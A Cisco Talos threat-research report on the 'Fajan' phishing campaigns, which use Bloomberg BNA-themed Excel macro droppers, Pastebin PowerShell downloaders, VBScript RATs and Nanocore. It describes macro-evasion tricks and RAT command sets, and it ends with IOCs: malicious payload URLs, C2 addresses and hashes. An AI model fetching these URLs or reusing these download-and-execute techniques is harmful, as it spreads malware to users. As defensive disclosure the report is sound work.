By Vanja Svajcer.
- Some malware campaigns are designed to spread malware to as many people as possible — while some others carefully choose their targets. Cisco Talos recently discovered a malware campaign that does not fit in any of the two categories. This actor has a relatively low volume of recovered samples, which makes it difficult to decide whether the campaigns are carefully targeted or mass-spammed.
- Cisco Talos recently discovered a series of low volume email campaigns we're calling "Fajan," targeting users with Bloomberg BNA-based email messages since at least March 2020.
- These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably Scripting - T1064, PowerShell - T1059.001, Process Injection - T1055, Non Standard Port - T1571, Remote Access Software - T1219, Input Capture - T1056, Obfuscated Files or Information - T1027 and Registry Run Keys / Startup Folder - T1547.001
The campaigns are likely a work of a single actor that keeps experimenting with various TTPs to make the campaigns more difficult to detect and more successful.
We believe this is the first time anyone's documented Fajan's operations. The actor is actively maintaining the tools and has been active since March 2020. Based on the observed IOCs and TTPs, we have a moderate confidence that the actor is an Arabic-speaking person or group.
How did it work?
The infection starts with an email containing a message which pretends to come from Bloomberg's BNA division — a site dedicated to providing legal and regulatory information to professionals. The email contains an Excel spreadsheet as an attachment, containing macro code to either download the next infection stage or drop and run the final payload.
The payload is always a RAT that allows the attacker to take control over the infected system using HTTP over a non-standard TCP port.
The actors behind Fajan campaigns are actively maintaining and developing functionality to make the attacks more successful. The campaigns use email messages, which is still the most commonly used vector in a successful compromise. The inclusion of remote access trojans as payloads of the campaign indicate the actors may want to carry out surveillance operations or steal user data. The C2 servers were not responsive at the time of analysis and we could not discover the final objective of the campaigns.
All Fajan email messages contain basic content that purportedly inform a subscriber of the Bloomberg BNA service that they owe a payment to and includes an Excel spreadsheet as an attachment.
The attachment name always contains some form of the Bloomberg BNA Invoice name combined with a random number specific for a particular campaign. Some early examples of campaign email messages contain a second attachment containing a copy of the email body text as a clean RTF file.
Example of an Fajan email campaign from April 2020.
The phone number included in Fajan's emails seems to be a private phone number located in New York, and is likely unrelated to the actor's true phone number.
Excel attachment VBA macro code
Each Bloomberg-themed campaign attachment contains VBA code that differs from other, similar campaigns. The changes may have been generated by an automated tool, and in some instances, even coded by the actor.
The VBA code is lightly obfuscated to break the most obvious strings, such as the filenames. The actors hope these small changes will be sufficient to make detection more difficult. One notable feature of most Fajan droppers is that they place some of the content into the Excel spreadsheet cells which may make emulation of the code and detection more difficult. Defenders will sometimes only scan the contents of the usual macro streams to write their detection, so placing it the cell could bypass this technique.
Excel cells containing malicious code snippets used by VBA macros.
The second example we give here is a VBA dropper that drops and executes a VBScript-based payload with the filename "webstyle.vbs."
VBA macro to drop and execute webstyle.vbs.
The VBA macro code almost always ends with a snippet that deletes the cell contents hosting fragments of malicious code and adds additional, legitimate-looking content, to the first cells in an Excel worksheet. This means the VBA code will be rendered unusable after running once, but it makes the document slightly more difficult to discover.
Cleanup VBA code toward the end of the Workbook_Open function.
Excel 4.0 formula macros
Approximately 60 percent of the attachments use VBA to drop and run a malicious payload. The rest of the attachments contain Excel 4.0 macro formulas designed to be executed when the files are open. All of them contain a simple code to execute a PowerShell command line to download and execute the next stage from a Pastebin URL. The raw content of the Pastebin URL is supplied as an argument to the Invoke-Expression (IEX) scriptlet, which executes the downloaded code in memory.
Excel 4.0 macro formula downloader code.
Intermediate stages It is not entirely clear why one or more intermediate stages are used, as the attacks can be stopped by blocking any individual stage. The more stages there are, the more likely the detection will be effective. This may conceal the location of the final payload or to allow the actors the flexibility to change the payload by changing the content of intermediate stages.
Pastebins — simple PowerShell downloaders
All of the retrieved Pastebins contain code to download and run a payload from a free file-sharing site Top4top.io, all except one early example whose URL points to a payload hosted by the Amazon S3 service.
One outlier downloader from Pastebin with the payload hosted using the Amazon S3 storage service.
Top4top.io is a free file-sharing site that is popular among users in Egypt, Algeria and Yemen, according to its Cisco Umbrella domain requester distribution. Usually, Top4top URLs from the intermediate stages look like media file types but the downloaded files are VBScript-based payloads using filenames "c.vbs" or "NoSleep.vbs".
NoSleep.vbs, a final payload is downloaded from Top4Top.io.
Top4Top.io seems to be aware of the frequent abuse of the site, as there is a dedicated section for reporting it to the operators of the site, which is hosted by OVH.
In some cases, the Top4Top intermediate stage was already removed after an abuse report.
The client expects the C2 server to send commands and parameters in a HTTP response with a typical command used to download and run additional modules from a URL. Here, we see an example of the command "RF," which is used to create another script file in the user's Temporary folder and run it using the run function of the Wscript.Shell ActiveX object.
- Sc: Download a script file into the user's Temp folder and run it.
- Ex: Execute downloaded code using the eval function
- RF: Same as Sc
VBScript payloads The payload is a lightly obfuscated VBScript in the Pastebin download branch that could be easily deobfuscated.
Obfuscated Nosleep.vbs payload.
Other similar scripts have been uploaded to VirusTotal. Their authorship is claimed by an actor with a handle "Security.Najaf." This may imply the Fajan's author origin to be Iraq, although it could also be just a coincidence or false flag.
It is also possible that we are dealing with an entirely different actor, simply reusing the available script code or employing a code generator developed by Security.Najaf. Nevertheless, we decided to name the campaigns Fajan, reversing the string used to split the command sent from the C2 server.
A snippet of Fajan VBScript-based RAT code.
Here is the list of supported commands by one version of a VBScript based RAT:
- Exc: Create a file in the user's temp folder, download and save the content and run the file.
- Nim: Download and save a file in the user's Startup folder, using the filename supplied by the C2 server.
Nanocore RAT payload One exception to the usual pattern of dropping or downloading a script based payload is an instance discovered on Feb. 16, 2021. Here, we are dealing with an almost identical email campaign, but the Excel file is a bit different.
A Fajan campaign, but with the Nanocore RAT downloader as the payload. The attachment size differs and the attachment naming scheme is slightly different.
Instead of downloading the next stage from Pastebin or dropping a final payload, the VBA macro drops and executes a VBScript-based downloader.
VBScript-based downloader dropped and executed by the VBA macro code.
Once again, the payload loader is downloaded from the Top4Top.io file sharing site. The content of the loader is downloaded to memory and it contains a PowerShell code very similar to what we previously described in our post about recent Masslogger campaigns.
Nanocore payload stored as a lightly obfuscated PowerShell string.
This indicates that actors behind Fajan and behind related MassLogger and Agent Tesla campaigns are using a similar toolkit to generate the .NET DLL assembly loaders which decode the payload and load the payload into the process space of the legitimate Windows process msbuild.exe.
Nanocore payload is injected into a msbuild.exe instance.
Nanocore is a well-known commercial Trojan available for sale since 2013. The author was arrested in 2017 and was sentenced to 33 months in prison. Ever since, the development of Nanocore stopped, but some versions have been successfully cracked and are widely used by attackers.
The Nanocore client is written in C# and contains a resource segment with the configuration information which is extracted, decompressed and decrypted when the client is launched.
Nanocore configuration reading function.
Once decrypted, the configuration can be dumped from memory. Alternatively, a Nanocore dumper tool released by Mario Henkel can be used to extract the information from the client without debugging.
We extracted the configuration information from the client that shows the version 18.104.22.168 which is one of the cracked versions. The build date for the campaign executed on Feb. 16 was listed as Jan. 11, 2021 and the C2 server used was 22.214.171.124 using the TCP port 83.
Dumped Nanocore configuration.
Nanocore is a modular RAT supporting an ecosystem allowing the developer and its affiliates to use additional plugins embedded into the final payload using the Nanocore Builder tool.
Nanocore GUI displaying the available plugins.
This specific payload was configured to include the following plugins:
- Client Plugin: Handles communications with the C2 server.
- Core Plugin: Additional functions to collect recon about the client.
- Management Plugin: Remote console, remote registry editor, file browser, task manager.
- Network Plugin: Additional network support such as reverse SOCKS proxy.
- Security Plugin: Access to client firewall and anti-malware configuration.
- Surveillance Plugin: Password stealing and keylogging.
- SurveillanceEx Plugin: Remote desktop support, video and audio capture.
- Tools Plugin: Miscellaneous functions, instant messaging, memory and process cleanup.
Infection chains observed in Fajan campaigns.
We've examined sustained campaigns using Bloomberg BNA-themed email messages as the initial infection vector. Fajan's author has been actively developing the campaigns since at least March 2020. We named these campaigns "Fajan" based on the string that may indicate its author, taken from the body of a script payload.
There is not enough information to show if these campaigns are targeted or aiming to attack any user. Currently, we do not have enough information to decide what is the final goal of those campaigns, since the final payload is a RAT with the ability to remotely control infected systems and install additional software.
Nevertheless, we feel it is important to document Fajan's activities to show how the actor is varying TTPs over a period of time and to describe different techniques used to make the campaigns more successful.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically.
Cisco Secure Email can block malicious emails sent by threat actors as part of their campaign.
Cisco Secure Malware Analytics helps identify malicious binaries and builds protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Excel attachments 5893cbdb7d3f443668a3d48c3d1ab559d33bafe553e0e988c5d32889276229e5 - 02.16.2021
7bb5a4d74b493666671bda32e8e056a4cc53144b2892ae408c6530c3a9c97b58 - 02.15.2021
d5f5ddf9f82f0b757883d8e0fa319c95f2c30a10436ba820384967822ddd9fc8 - 01.27/28.2021
6c229a383854798275d687519fe363b24f7f568482ca1fc77d68e9aa9c902613 - 06.11.2020
0bea13a67c5cf17b1039823a1835855535bfbd3ac808461ae78fa26f77a79171 - 03.15.2021
e1743dfaefdafb712d6b70d0c31d662359e028805dd5fdfe7a7239e5ce569c1a - 04.17.2020
f59fbaed1d475b840800b2ad5c56ffb984db16c194d2a2c09a7f4d851cb99388 - 02.03.2021
f2b0beea8f515e170a9696c64d86f1ce9b4fd1d8c52c34411421c3cd1989476c - 02.10.2021
87146ae8db88ce1c2b11c0b2896a95f7eeded4b21c88517619bbebbe39791a12 - 05.12.2020
e0250920e3e226a650c027a87ff10dd33295cc1853ad06eb3ea1d7a99a5a96a1 - 08.12.2020
943b70f97713875e8e7bd5487b5dd1aa6745df26ce2eba37737207ee86092b8b - 03.22.2021
4772923cf1f5af42d84a91257cab8d7a9461ba629659b4abe6b9a1b7357d47d4 - 03.08.2021
49e109a4d9fa02c06e9473ee72a3754cfc34591366add7936113dcd6258a8051 - 04.06.2021
bc847cdc5b4f6874f60bdb369ac2fe411df29a815e3028281bfb34263ddda2d8 - 04.12.2021
Payloads and downloaders 570cd232c24dd7733a688f6e7373baf5f493ff65ed198346a6728b79551c77b1 - Dropped by 49e109a4d9fa02c06e9473ee72a3754cfc34591366add7936113dcd6258a8051
f95c808947724e26359848c28a25dfd2881f4f3bdd9d861e1990b66abeade09e - Dropped by 5893cbdb7d3f443668a3d48c3d1ab559d33bafe553e0e988c5d32889276229e5
128644d8ea3bbcaac05e927288d20bb91cd344fda0e422f9aab34e63b3bb07f2 - Dropped by 0bea13a67c5cf17b1039823a1835855535bfbd3ac808461ae78fa26f77a79171
fc13c0b783207753c85cfe8d31bc214a187606933586ca36d502d113e87f5ea2 - VBS downloader dropped by 7bb5a4d74b493666671bda32e8e056a4cc53144b2892ae408c6530c3a9c97b58
0aaab7302254def2fe9449364995eb95b9c3896fe435a701a129556b845e0cd6 - Dropped by 943b70f97713875e8e7bd5487b5dd1aa6745df26ce2eba37737207ee86092b8b
120e6fe44d30a8fb22882ac084669ccae70379f8e70569b5b8efd8bf305f8380 - Dropped by d5f5ddf9f82f0b757883d8e0fa319c95f2c30a10436ba820384967822ddd9fc8
e924952bacf7d5d5f076a8a4529a1e3934c0224d09b57d6616b6b5ec7f39a478 - Payload simple VBS RAT
11aec399f195ab749cf2b7005e5ca7389b513aa08e0d67a72fb970f88730a657 - NanoCore DLLLoader/Injector from VB source
66fe2551210e4aa15195e49a1d16e19a5cd5dbe53d5605c7b4cc72d2dc015566 - NanoCore Payload
52f152ea653f725d55da186ee416408c2ee8a55b31119a50a5693aea0449ecab - Payload downloaded from https://k.top4top.io/p_1893s178y1.jpg
3b07a293b7a9a3dfd5371c13e5691a3275f914429e2d9e33d834055e9ddc38ba - NanoCore RAT PowerShell main loader
URLshttps://e.top4top.io/m_1593v3zvv1.mp4 - Payload
https://k.top4top.io/p_1893s178y1.jpg - Payload
https://pastebin.com/raw/STGGsHfq - Pastebin PowerShell
https://pastebin.com/raw/fASw9wCZ - Pastebin PowerShell
https://pastebin.com/raw/TB8DyWCt - Pastebin PowerShell
https://pastebin.com/raw/v3YMf04z - Pastebin PowerShell
https://pastebin.com/raw/MESH21tR - Pastebin PowerShell
https://i.top4top.io/p_1869b2cpe1.jpg - NanoCore RAT VB.NET source
https://blob-ap-south-1-ukyez4.s3.ap-south-1.amazonaws.com/sara/0e/0e4d/0e4d1215-3079-468d-9188-6eb6a8e0df14.bin?response-content-disposition=attachment%3B%20filename%3D%22news.vbs%22&response-content-type=&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAI75SICYCOZ7DPWTA%2F20200417%2Fap-south-1%2Fs3%2Faws4_request&X-Amz-Date=20200417T170615Z&X-Amz-SignedHeaders=host&X-Amz-Expires=1800&X-Amz-Signature=9fbebca4d882e098045c835add71a9b652dfddd7f0fb529974116f4066ac8f0a - Payload on S3
https://d.top4top.io/m_15684cm0o1.mp3 - Payload
126.96.36.199C2 -server - Romania
188.8.131.52C2 -server - Romania, Netwire, RevengeRAT,
184.108.40.206C2 -server - Romania
220.127.116.11:83 -C2 server - Nanocore - Switzerland, known C2 IP for other families such as XpertRAT